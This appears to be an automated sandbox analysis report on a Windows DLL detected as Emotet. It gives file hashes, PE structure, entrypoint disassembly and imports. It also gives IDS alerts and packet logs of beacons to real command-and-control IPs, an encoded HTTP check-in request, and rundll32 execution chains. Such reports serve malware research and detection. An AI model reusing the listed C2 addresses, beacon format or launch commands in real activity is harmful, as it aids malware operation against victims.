SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4R:BJiRdwfu2SRU4R
MD5:	3D3C4231B9E84ABED0A4C1867EE0A642
SHA1:	A990DA2ADDB9940509BA2B550E036DF2F0E4290B
SHA-256:	53505BF10C48F5B6987771742C719CCCE4E730099C3DC875305367FC2F3EC611
SHA-512:	EF5819FF322F2B027D4F7D306D66BC77DADFA9C486C49E31551495D9AA1F76585ABD3EA53326A5086B4B6A04F5299B7FC04F275537B67620949D268960FBB9E5
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x3252d91e, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25048484936123694
Encrypted:	false
SSDEEP:	384:Qbh+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:QbKSB2nSB2RSjlK/+mLesOj1J2
MD5:	F16009FB8910DC6ED0D8D1CF8AE94A00
SHA1:	0CC3D6827147087DC7443B88140AEEDDAF66D286
SHA-256:	9050516C8ED84027D4852787C94C8585FF1D24372F53948D7AAACC461EC95968
SHA-512:	71D39E5D2F8A95BB299D1BE0524209CE8E6BDCBF384DEF063A448946C6BD8CBF7BE690C710F6B92FED8CF9FFE4EC6BC52FC2F64E3345AA148C0247187C4E45F1
Malicious:	false
Preview:	2R..... ................e.f.3...w........................)......5...y...2...y1.h.(......5...y....)..............3...w...........................................................................................................B...........@...................................................................................................... ....................................................................................................................................................................................................................................................#\|..5...y..................(....5...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07224678119538147
Encrypted:	false
SSDEEP:	3:lumD7vp2RBXty7DcPetGHw//8l/TXtAll3Vkttlmlnl:omDriLyCQX8l/xA3
MD5:	4C940CB66541C87992EDAAF0D2FE6E2A
SHA1:	BAD6AD30FCD2D91785BF7FC4910B31E1F5F4DF1D
SHA-256:	B9B734EDCBE64598B9E8324AC8E2D511CA713891BEEA97E31BAEE3C1ADE261C8
SHA-512:	CE48230D00C250A631DE3611B77DEFD6B6414AA4500BE5C7E1EA5CE07943BF2E5EEF39613708A8B9693BBB4724BCA2924070EF7EE68891FF6EDB7EF76BE3E39A
Malicious:	false
Preview:	........................................3...w...2...y1..5...y...........5...y...5...y.......5...y.u................(....5...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1061641183243216
Encrypted:	false
SSDEEP:	6:kKvdEfzk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:nGfz9kPlE99SNxAhUeYlUSA/t
MD5:	5428C598E593776DFD9C879BAF45E38D
SHA1:	440920BFABC63CCBB59AC0457FACCAFA2C40A2B2
SHA-256:	C5EBF4F0C778797EB7812BFCD020FB870564F9DF859E4E541EB8706203F01C4A
SHA-512:	6EF6AA85E1A7EC6DC87DA2EA74544F0AAC3954B9A66CA42471F0C9052BAB17B59251E5AD65BE2EA672D367A85705C20738DB103AF6CDAB61EE3A46CEE539F0B0
Malicious:	false
Preview:	p...... ...........\....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.4287905510522645
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20%
File name:	qrb6jVwzoe.dll
File size:	425984
MD5:	56547488fb182b73f83211903ce2dd30
SHA1:	e3c962932fb99e7685ea989356d60afc4045c52f
SHA256:	bf0cadbc8a6b28a54eb0db5f2afe582a02d5f1dedb058097abc1d7b43ba7deb0
SHA512:	f1d4ae06426e597af23e21d97946812d9bb7d546687cd53b8efec73a82216f998e9c4f7556cf6791aa1b3d32787c57056777a3bde6563ac5b7b51b48f0455dce
SSDEEP:	6144:1ACzUEcRRKxe0DUAldEzpLcE0sepO8+wM:1lxemHQtcE0sLvd
File Content Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....A.a...........!.....T...P.......................................................H....@..........................S..P..

File Icon


Icon Hash:	64da98ecd2ceead4

Static PE Info

General
Entrypoint:	0x1001cab0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x619E410C [Wed Nov 24 13:41:32 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	ef559179cbfc08fc57c1e24c241992ea

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FED612600A7h
call 00007FED61260107h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FED6125FF58h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
sub esp, 14h
and dword ptr [ebp-0Ch], 00000000h
lea eax, dword ptr [ebp-0Ch]
and dword ptr [ebp-08h], 00000000h
push eax
call dword ptr [1002806Ch]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [10028068h]
xor dword ptr [ebp-04h], eax
call dword ptr [10028050h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [10028064h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov ecx, dword ptr [1004609Ch]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FED612600A6h
test esi, ecx
jne 00007FED612600C8h
call 00007FED61260039h
mov ecx, eax
cmp ecx, edi
jne 00007FED612600A9h
mov ecx, BB40E64Fh
jmp 00007FED612600B0h
test esi, ecx
jne 00007FED612600ACh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [1004609Ch], ecx
not ecx
pop edi
mov dword ptr [10046098h], ecx
pop esi
ret
push 1005E118h
call dword ptr [10028070h]
ret

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x45300	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x45350	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x61000	0xb7b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d000	0x10f0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x44be0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x44c18	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x28000	0x124	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.flat	0x1000	0x446	0x600	False	0.643229166667	data	5.67523607022	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text	0x2000	0x252cb	0x25400	False	0.536086933725	data	5.88986915783	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x28000	0x1d9da	0x1da00	False	0.494923523207	data	5.10028459369	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x46000	0x1aab0	0x17e00	False	0.51547161322	data	4.96853823593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x61000	0xb7b8	0xb800	False	0.177564538043	data	3.89759299523	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6d000	0x10f0	0x1200	False	0.782335069444	data	6.41113333729	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x614b0	0xb13	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia
RT_ICON	0x61fc8	0xea8	data	Russian	Russia
RT_ICON	0x62e70	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	Russian	Russia
RT_ICON	0x63718	0x568	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_ICON	0x63c80	0xc4a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia
RT_ICON	0x648d0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 61695, next used block 4294934272	Russian	Russia
RT_ICON	0x68af8	0x25a8	data	Russian	Russia
RT_ICON	0x6b0a0	0x10a8	data	Russian	Russia
RT_ICON	0x6c148	0x468	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_GROUP_ICON	0x6c5b0	0x84	data	Russian	Russia
RT_VERSION	0x612b0	0x200	data	Russian	Russia
RT_MANIFEST	0x6c638	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

InterlockedFlushSList, GetProcessHeap, HeapAlloc, HeapFree, GetLastError, GetCommandLineA, ExitProcess, GetModuleHandleA, GetProcAddress, CloseHandle, TerminateProcess, WaitForSingleObject, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, FreeLibrary, IsBadReadPtr, GetCurrentProcessId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, WriteConsoleW, DecodePointer, RtlUnwind, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, RaiseException, GetModuleHandleExW, GetModuleFileNameW, LCMapStringW, GetStdHandle, GetFileType, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetStdHandle, SetFilePointerEx, GetStringTypeW, HeapSize, CreateFileW

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x1000209d

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2021
ProductVersion	1.0.0.1
FileDescription	Application
FileVersion	1.0.0.1
CompanyName	A company
Translation	0x0419 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/24/21-16:49:09.812890	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49755	443	192.168.2.6	51.178.61.60
11/24/21-16:49:10.518553	TCP	2404312	ET CNC Feodo Tracker Reported CnC Server TCP group 7	49756	80	192.168.2.6	168.197.250.14
11/24/21-16:49:12.373719	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49757	8080	192.168.2.6	45.79.33.48
11/24/21-16:49:33.450645	TCP	2404322	ET CNC Feodo Tracker Reported CnC Server TCP group 12	49760	8080	192.168.2.6	196.44.98.190
11/24/21-16:49:54.536525	TCP	2404314	ET CNC Feodo Tracker Reported CnC Server TCP group 8	49783	7080	192.168.2.6	177.72.80.14
11/24/21-16:49:55.088956	TCP	2021013	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)	7080	49783	177.72.80.14	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 16:49:09.812890053 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:09.812928915 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:09.813005924 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:09.837883949 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:09.837908983 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:09.956489086 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:09.956604004 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:10.298460007 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:10.298489094 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:10.298830032 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:10.298909903 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:10.306252003 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:10.348871946 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:10.406735897 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:10.406831980 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:10.406847954 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:10.406882048 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:10.406909943 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:10.406945944 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:10.436374903 CET	49755	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:49:10.436402082 CET	443	49755	51.178.61.60	192.168.2.6
Nov 24, 2021 16:49:10.518553019 CET	49756	80	192.168.2.6	168.197.250.14
Nov 24, 2021 16:49:10.789995909 CET	80	49756	168.197.250.14	192.168.2.6
Nov 24, 2021 16:49:11.309665918 CET	49756	80	192.168.2.6	168.197.250.14
Nov 24, 2021 16:49:11.581053972 CET	80	49756	168.197.250.14	192.168.2.6
Nov 24, 2021 16:49:12.090867043 CET	49756	80	192.168.2.6	168.197.250.14
Nov 24, 2021 16:49:12.362139940 CET	80	49756	168.197.250.14	192.168.2.6
Nov 24, 2021 16:49:12.373718977 CET	49757	8080	192.168.2.6	45.79.33.48
Nov 24, 2021 16:49:15.388072014 CET	49757	8080	192.168.2.6	45.79.33.48
Nov 24, 2021 16:49:21.390383959 CET	49757	8080	192.168.2.6	45.79.33.48
Nov 24, 2021 16:49:33.450644970 CET	49760	8080	192.168.2.6	196.44.98.190
Nov 24, 2021 16:49:36.452322006 CET	49760	8080	192.168.2.6	196.44.98.190
Nov 24, 2021 16:49:42.468460083 CET	49760	8080	192.168.2.6	196.44.98.190
Nov 24, 2021 16:49:54.536525011 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:49:54.785692930 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:49:54.786612988 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:49:54.786643028 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:49:55.035741091 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:49:55.088956118 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:49:55.088983059 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:49:55.089173079 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:49:56.942157984 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:49:57.191248894 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:49:57.192994118 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:49:57.197318077 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:49:57.197981119 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:49:57.487085104 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:49:58.586780071 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:49:58.587002039 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:50:01.587296009 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:50:01.587367058 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:50:01.587383032 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:50:01.587440014 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:50:59.695960045 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:50:59.696007013 CET	49783	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:50:59.946142912 CET	7080	49783	177.72.80.14	192.168.2.6
Nov 24, 2021 16:50:59.946266890 CET	49783	7080	192.168.2.6	177.72.80.14

HTTP Request Dependency Graph

51.178.61.60

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49755	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2021-11-24 15:49:10 UTC	OUT	GET /BCcDzRknSjFPjuOxHLZvVqcO HTTP/1.1 Cookie: QMpLEjjFd=c4U8GYO3gBQ2KCd18VNTs9PT8hpdVNqj4zLzgZE1fFI9x0SPtcMipNFNESf8CsAVem5JWMqQ8ndGaJ1DdBO6E5KdfcNjE1YapLmU92FtgBNQbP19LEuO+ya4SHRYKzrZSycrfZTK0DPGNQZNeJ6j1cioezM7bzeTQ/thQoUAbkNL0mgdSgnH4s5+Omur7YLxQg0NgsR41aDxprzsQzXD6m2hLQv3kzo0+dQAtysUr4iTrR26F9NeGzF2zkgnUERUJbSQGPdy5NBtzT8NJyvrR6k15te4INQfbmWwqTBzGbEzsQ== Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
2021-11-24 15:49:10 UTC	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 24 Nov 2021 15:49:10 GMT Content-Type: text/html Content-Length: 162 Connection: close
2021-11-24 15:49:10 UTC	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 7156 Parent PID: 3900

General

Start time:	16:48:55
Start date:	24/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll"
Imagebase:	0xd20000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4716 Parent PID: 7156

General

Start time:	16:48:56
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5184 Parent PID: 7156

General

Start time:	16:48:56
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 580 Parent PID: 4716

General

Start time:	16:48:56
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.359659135.0000000000FA6000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6228 Parent PID: 5184

General

Start time:	16:48:56
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.363179746.0000000000B42000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000003.359231508.0000000000B46000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000003.359009454.0000000000B46000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6240 Parent PID: 580

General

Start time:	16:48:57
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",Control_RunDLL
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000003.359880008.0000000000C16000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000003.359302351.0000000000C16000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.361400733.0000000000BDA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6416 Parent PID: 6228

General

Start time:	16:48:59
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan
Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.365562801.0000000000F66000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6376 Parent PID: 6416

General

Start time:	16:49:00
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL
